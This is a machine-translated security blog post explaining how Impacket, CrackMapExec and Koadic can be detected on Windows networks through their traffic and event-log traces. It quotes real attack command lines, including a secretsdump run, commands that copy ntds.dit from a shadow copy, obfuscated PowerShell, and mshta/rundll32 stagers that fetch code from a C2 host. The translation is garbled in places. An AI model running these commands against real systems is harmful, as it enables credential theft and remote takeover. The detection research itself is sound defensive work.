⬆️ ⬇️

How to detect attacks on Windows infrastructure: we study the tools of hackers





The number of attacks in the corporate sector is growing every year: for example, in 2017, there were 13% more unique incidents than in 2016, and by the end of 2018, there were 27% more incidents than in the previous period. Including those where the main working tool is the Windows operating system. In 2017–2018, APT Dragonfly, APT28, APT MuddyWater groups launched attacks against government and military organizations in Europe, North America and Saudi Arabia. And they used three tools for this - Impacket , CrackMapExec and Koadic . Their source code is open and available on GitHub.



It should be noted that these tools are not used for primary penetration, but for the development of an attack inside the infrastructure. Attackers use them at different stages of attack, following after overcoming the perimeter. This, by the way, is difficult to detect and often only with the help of technologies that detect traces of compromise in network traffic or tools that allow detecting active actions of an attacker after it penetrates the infrastructure . Tools provide many functions - from transferring files to interacting with the registry and executing commands on a remote machine. We conducted a study of these tools to determine their network activity.

')

What we needed to do:





What gives the attacker these tools? If this is Impacket, then attackers get a large library of modules that can be used at different stages of the attack, following after overcoming the perimeter. Many tools use Impacket modules inside - for example, Metasploit. It has dcomexec and wmiexec for remote command execution, secretsdump for retrieving accounts from memory that are added from Impacket. As a result, the correct detection of the activity of such a library will provide the detection of derivatives.



About CrackMapExec (or just CME), the creators wrote by chance "Powered by Impacket". In addition, CME has in itself ready-made functionality for popular scenarios: these are Mimikatz for getting passwords or their hashes, and the introduction of Meterpreter or the Empire agent for remote execution, and Bloodhound on board.



The third tool we choose is Koadic. It is quite fresh, was presented at the international hacker conference DEFCON 25 in 2017 and is notable for non-standard approach: work through HTTP, Java Script and Microsoft Visual Basic Script (VBS). This approach is called living off the land: the tool uses a set of dependencies and libraries built into Windows. The creators call it COM ommand & ontrol, or 3.



IMPACKET



Impacket's functionality is quite wide, ranging from intelligence inside AD and data collection from internal MS SQL servers, to technicians to get credentials: this is an SMB relay attack, and receiving from the domain controller the ntds.dit file containing user password hashes. Also, Impacket remotely executes commands using four different methods: via WMI, a service for managing Windows Scheduler, DCOM and SMB, and for this it needs credentials.



Secretsdump



Let's look at secretsdump. This is a module whose purpose can be both user machines and domain controllers. With it, you can get a copy of the memory areas LSA, SAM, SECURITY, NTDS.dit, so it can be seen at different stages of the attack. The first step in the operation of the module is SMB authentication, for which either a user password or his hash is required to automatically conduct the Pass the Hash attack. Next comes a request to open access to Service Control Manager (SCM) and gain access to the registry via the winreg protocol, using which an attacker can find out the data of the branches of interest and get results via SMB.



In fig. 1 we see how exactly when using the winreg protocol, access to the registry key with LSA occurs. To do this, use the DCERPC command with opcode 15 - OpenKey.





Fig. 1. Opening the registry key using the winreg protocol



Further, when key access is obtained, the values ​​are saved by using the SaveKey command with opcode 20. Impacket does this in a very specific way. It saves values ​​to a file whose name is a string of 8 random characters with the addition of .tmp. In addition, this file is further uploaded via SMB from the System32 directory (Fig. 2).





Fig. 2. Scheme for obtaining a registry key from a remote machine



It turns out that it is possible to detect such activity on the network by querying certain branches of the registry using the winreg protocol, specific names, commands, and their order.



This module also leaves traces in the Windows event log, thanks to which it is easily detected. For example, as a result of the command



secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC 


in the Windows Server 2016 log, we will see the following key event sequence:



1. 4624 - Remote Logon.

2. 5145 - checking access rights to the remote winreg service.

3. 5145 - check file permissions in the System32 directory. The file has a random name mentioned above.

4. 4688 - creating a cmd.exe process that starts vssadmin:



 “C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 


5. 4688 - creating a process with the command:



 "C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 


6. 4688 - creating a process with the command:



 "C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\NTDS\ntds.dit %SYSTEMROOT%\Temp\rmumAfcn.tmp ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 


7. 4688 - creating a process with the command:



 "C:\windows\system32\cmd.exe" /Q /c echo c:\windows\system32\cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%\Temp\__output > %TEMP%\execute.bat & c:\windows\system32\cmd.exe /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 


Smbexec



Like many tools for post-operation, Impacket has modules for remote command execution. We will focus on smbexec, which gives an interactive command shell on a remote machine. This module also requires SMB authentication with either a password or its hash. In fig. 3 we see an example of the operation of such a tool, in this case, it is the local administrator console.





Fig. 3. Interactive smbexec console



The first stage of the smbexec operation after authentication is the opening of the SCM by the OpenSCManagerW command (15). The query is notable: in it, the MachineName field is DUMMY.





Fig. 4. Request to open Service Control Manager



Next, a service is created using the CreateServiceW (12) command. In the case of smbexec, we can see every time the same logic of command building. In fig. 5 green unchanged command parameters, yellow - what an attacker can change. It is easy to see that the name of the executable file, its directory and output file can be changed, but the rest is much more difficult to change without disturbing the logic of the Impacket module.





Fig. 5. Request to create a service using Service Control Manager



Smbexec also leaves obvious traces in the Windows event log. In the Windows Server 2016 log for an interactive command shell with the ipconfig command, we see the following key sequence of events:



1. 4697 - installation of the service on the victim's machine:



 %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 


2. 4688 - creation of the cmd.exe process with arguments from clause 1.

3. 5145 - checking the permissions of the __output file in the C $ directory.

4. 4697 - installation of the service on the victim's machine.



 %COMSPEC% /Q /c echo ipconfig ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat 


5. 4688 - the creation of the cmd.exe process with the arguments from clause 4.

6. 5145 - Authorization of access to the __output file in the C $ directory.



Impacket is the basis for developing attack tools. It supports almost all protocols in the Windows infrastructure and at the same time has its own characteristic features. Here you can find specific winreg requests, use of the SCM API with typical command generation, file name format, and SMB share SYSTEM32.



CRACKMAPEXEC



The CME tool is designed primarily to automate the routine actions that an attacker has to perform in order to advance within the network. It allows you to work in conjunction with the notorious Empire agent and Meterpreter. To execute commands covertly, CME can obfusts them. Using Bloodhound (a separate intelligence tool), an attacker can automate the search for an active domain administrator session.



Bloodhound



Bloodhound as a standalone tool allows you to conduct advanced intelligence within the network. It collects data about users, machines, groups, sessions, and is supplied as a PowerShell script or binary file. LDAP or SMB based protocols are used to collect information. The CME integration module allows you to load the Bloodhound onto the victim's machine, run and retrieve the collected data after execution, thereby automating the actions in the system and making them less noticeable. The graphical shell of Bloodhound presents the collected data in the form of graphs, which allows you to find the shortest path from the attacker's machine to the domain administrator.





Fig. 6. Bloodhound interface



To run on the victim’s machine, the module creates a task using ATSVC and SMB. ATSVC is an interface for working with the Windows Task Scheduler. CME uses its NetrJobAdd (1) function to create tasks over the network. An example of what the CME sends is shown in Figure 2. 7: This is a call to the cmd.exe command and the obfuscated code in the form of arguments in XML format.





Fig.7. Task creation via CME



After the task is submitted for execution, the victim's machine launches the Bloodhound itself, and you can see it in the traffic. The module is characterized by LDAP requests for retrieving standard groups, a list of all machines and users in a domain, and obtaining information about active user sessions via an SRVSVC NetSessEnum request.





Fig. 8. Getting a list of active sessions via SMB



In addition, the launch of Bloodhound on the victim's machine with auditing enabled is accompanied by an event with ID 4688 (process creation) and the process name «C:\Windows\System32\cmd.exe» . Notable in it are command line arguments:



 cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) " 


Enum_avproducts



Very interesting in terms of functionality and implementation of the module enum_avproducts. WMI allows using the WQL query language to retrieve data from various Windows objects, which is what the CME module actually uses. It generates requests to the AntiSpywareProduct and AntiMirusProduct classes about the protections installed on the victim’s machine. In order to obtain the necessary data, the module connects to the root \ SecurityCenter2 namespace, then generates a WQL query and receives a response. In fig. 9 shows the contents of such requests and responses. In our example, there was a Windows Defender.





Fig. 9. Network activity of the enum_avproducts module



Often, WMI (Trace WMI-Activity) auditing, in whose events you can find useful information about WQL queries, can be turned off. But if it is enabled, then if the enum_avproducts script is run, an event with ID 11 will be saved. It will contain the name of the user who sent the request, and the name in the root \ SecurityCenter2 namespace.



Each of the CME modules revealed their own artifacts, be it specific WQL queries or the creation of a specific type of task in the task scheduler with obfuscation and characteristic for Bloodhound activity in LDAP and SMB.



KOADIC



A distinctive feature of Koadic is the use of Windows-built JavaScript and VBScript interpreters. In this sense, it follows the trend of living off the land - that is, it has no external dependencies and uses standard Windows tools. This is a tool for a full-fledged Command & Control (CnC), since after an infection, an “implant” is installed on the machine, allowing it to be controlled. Such a machine, in the terminology of Koadic, is called "zombie." With a lack of privileges for full-fledged work on the side of the victim, Koadic has the opportunity to raise them using the UAC bypass techniques.





Fig. 10. Koadic command shell



The victim must initiate communication with the Command & Control server. To do this, it needs to apply for a pre-prepared URI and get the main body of Koadic using one of the students. In fig. Figure 11 shows an example for the mshta pager.





Fig. 11. Initializing a session with a CnC server



The response WS variable makes it clear that execution occurs via WScript.Shell, and the STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE variables contain key information about the parameters of the current session. This is the first request-response pair in an HTTP connection to the CnC server. Subsequent requests are directly related to the functionality of the modules called (implants). All Koadic modules work only with an active session with CnC.



Mimikatz



Just as CME works with Bloodhound, Koadic works with Mimikatz as with a separate program and has several ways to launch it. Below is the request-response pair for loading the Mimikatz implant.





Fig. 12. Transfer of Mimikatz to Koadic



You can see how the format of the URI in the request has changed. In it appeared the value of the variable csrf, which is responsible for the selected module. Do not pay attention to her name; we all know that CSRF is usually understood differently. In response, it was all the same main body Koadic, in which the code associated with Mimikatz was added. It is quite large, so consider the key points. Before us is the base64-encoded Mimikatz library, a serialized .NET class that will inject it, and arguments to run Mimikatz. The result of the execution is transmitted over the network in open form.





Fig. 13. Result of running Mimikatz on a remote machine.



Exec_cmd



Koadic also has modules that can remotely execute commands. Here we will see the same URI generation method and the familiar sid and csrf variables. In the case of the exec_cmd module, code is added to the body that is capable of executing shell commands. The following is the code contained in the HTTP response of the CnC server.





Fig. 14. Implant code exec_cmd



The variable GAWTUUGCFI with the familiar WS attribute is required to execute the code. With its help, the implant calls the shell, processing two code branches - shell.exec with the return of the output data stream and shell.run without return.



Koadic is not a typical tool, but has its own artifacts by which it can be found in legitimate traffic:





The initial connection initiates a steager, so it is possible to detect its activity through Windows events. For mshta, this is event 4688, which talks about creating a process with the start attribute:



 C:\Windows\system32\mshta.exe http://192.168.211.1:9999/dXpT6 


During Koadic execution, you can see other 4688 events with attributes that perfectly characterize it:



 rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;\..\..\..\mshtml,RunHTMLApplication rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;\..\..\..\mshtml,RunHTMLApplication "C:\Windows\system32\cmd.exe" /q /c chcp 437 & net session 1> C:\Users\user02\AppData\Local\Temp\6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1 "C:\Windows\system32\cmd.exe" /q /c chcp 437 & ipconfig 1> C:\Users\user02\AppData\Local\Temp\721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1 


findings



Trend living off the land is gaining popularity among intruders. They use the tools and mechanisms built into Windows for their needs. We see how the popular Koadic, CrackMapExec, and Impacket tools that follow this principle are increasingly found in APT reports. The number of forks on GitHub for these tools is also growing, new ones appear (now there are about a thousand of them). The trend is gaining popularity because of its simplicity: attackers do not need third-party tools, they already have on the victims' machines and help to bypass the means of protection. We focus on exploring network interaction: each tool described above leaves its mark on network traffic; their detailed study allowed us to teach our PT Network Attack Discovery product to detect them, which ultimately helps to investigate the entire chain of cyber incidents with their participation.



Authors :



Source: https://habr.com/ru/post/460517/



All Articles